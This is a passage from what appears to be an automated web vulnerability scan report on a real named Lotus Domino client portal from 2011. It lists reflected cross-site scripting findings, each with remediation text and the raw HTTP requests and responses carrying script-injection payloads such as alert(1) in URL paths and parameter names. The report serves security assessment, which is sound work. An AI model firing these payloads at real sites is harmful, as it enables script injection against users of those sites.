Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:14 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19325
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web69cd6"><script>alert(1)</script>060324dbfe8/framework.nsf/_format/screen_05112010.css?readform&ja=" name="RedirectTo" />
...[SNIP]...

3.115. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c4"><script>alert(1)</script>3dcf7cba5f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/_formatad2c4"><script>alert(1)</script>3dcf7cba5f9/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:20 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19334
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_formatad2c4"><script>alert(1)</script>3dcf7cba5f9/screen_05112010.css?readform&ja=" name="RedirectTo" />
...[SNIP]...

3.116. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3133'%3bf4524c4b8d8 was submitted in the REST URL parameter 3. This input was echoed as f3133';f4524c4b8d8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/_formatf3133'%3bf4524c4b8d8/screen_05112010.css?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:21 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19234
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
agent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/_formatf3133';f4524c4b8d8/screen_05112010.css?readform&ja='
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.117. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77bd5'%3b5c93d414ab4 was submitted in the REST URL parameter 4. This input was echoed as 77bd5';5c93d414ab4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/_format/screen_05112010.css77bd5'%3b5c93d414ab4?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:27 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19234
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
No + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/_format/screen_05112010.css77bd5';5c93d414ab4?readform&ja='
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.118. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/_format/screen_05112010.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671d3"><script>alert(1)</script>6a55aef7db5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/_format/screen_05112010.css671d3"><script>alert(1)</script>6a55aef7db5?readform&ja= HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:26 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19334
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css671d3"><script>alert(1)</script>6a55aef7db5?readform&ja=" name="RedirectTo" />
...[SNIP]...

3.119. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4e35"><script>alert(1)</script>0a608520f46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weba4e35"><script>alert(1)</script>0a608520f46/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:55 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19413
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/weba4e35"><script>alert(1)</script>0a608520f46/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1" name="RedirectTo" />
...[SNIP]...

3.120. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 827e7'%3b9e2e4f13a56 was submitted in the REST URL parameter 1. This input was echoed as 827e7';9e2e4f13a56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web827e7'%3b9e2e4f13a56/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19313
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web827e7';9e2e4f13a56/framework.nsf/scripts_05112010.js?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.121. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e996b'%3b52081a5011f was submitted in the REST URL parameter 3. This input was echoed as e996b';52081a5011f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/framework.nsf/scripts_05112010.jse996b'%3b52081a5011f?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:47:02 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19335
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/framework.nsf/scripts_05112010.jse996b';52081a5011f?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.122. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/framework.nsf/scripts_05112010.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dbad"><script>alert(1)</script>40e20d2ddfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/framework.nsf/scripts_05112010.js4dbad"><script>alert(1)</script>40e20d2ddfe?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:47:01 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19449
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js4dbad"><script>alert(1)</script>40e20d2ddfe?readform&c=1&w=1&b=1&p=1&di=1&e=1&sli=1&=1" name="RedirectTo" />
...[SNIP]...

3.123. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 413d5'%3b0770860f755 was submitted in the REST URL parameter 1. This input was echoed as 413d5';0770860f755 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web413d5'%3b0770860f755/home.nsf/ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19186
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
dbPath + '/switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web413d5';0770860f755/home.nsf/'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1'
           RedirectTo = ''

   </script>
...[SNIP]...

3.124. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb203"><script>alert(1)</script>e67e920816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webeb203"><script>alert(1)</script>e67e920816/home.nsf/ HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:18 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19282
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/webeb203"><script>alert(1)</script>e67e920816/home.nsf/" name="RedirectTo" />
...[SNIP]...

3.125. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7631f"><script>alert(1)</script>1c1d50ccf69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web/home.nsf/?7631f"><script>alert(1)</script>1c1d50ccf69=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:07 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19276
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/?7631f"><script>alert(1)</script>1c1d50ccf69=1" name="RedirectTo" />
...[SNIP]...

3.126. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /web/home.nsf/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb4b1'-alert(1)-'9b480330d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web/home.nsf/?bb4b1'-alert(1)-'9b480330d0c=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/?75ca7'-alert(document.location)-'6f3146d22d1=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.6.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:48:11 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19220
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
switch?openagent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/web/home.nsf/?bb4b1'-alert(1)-'9b480330d0c=1'
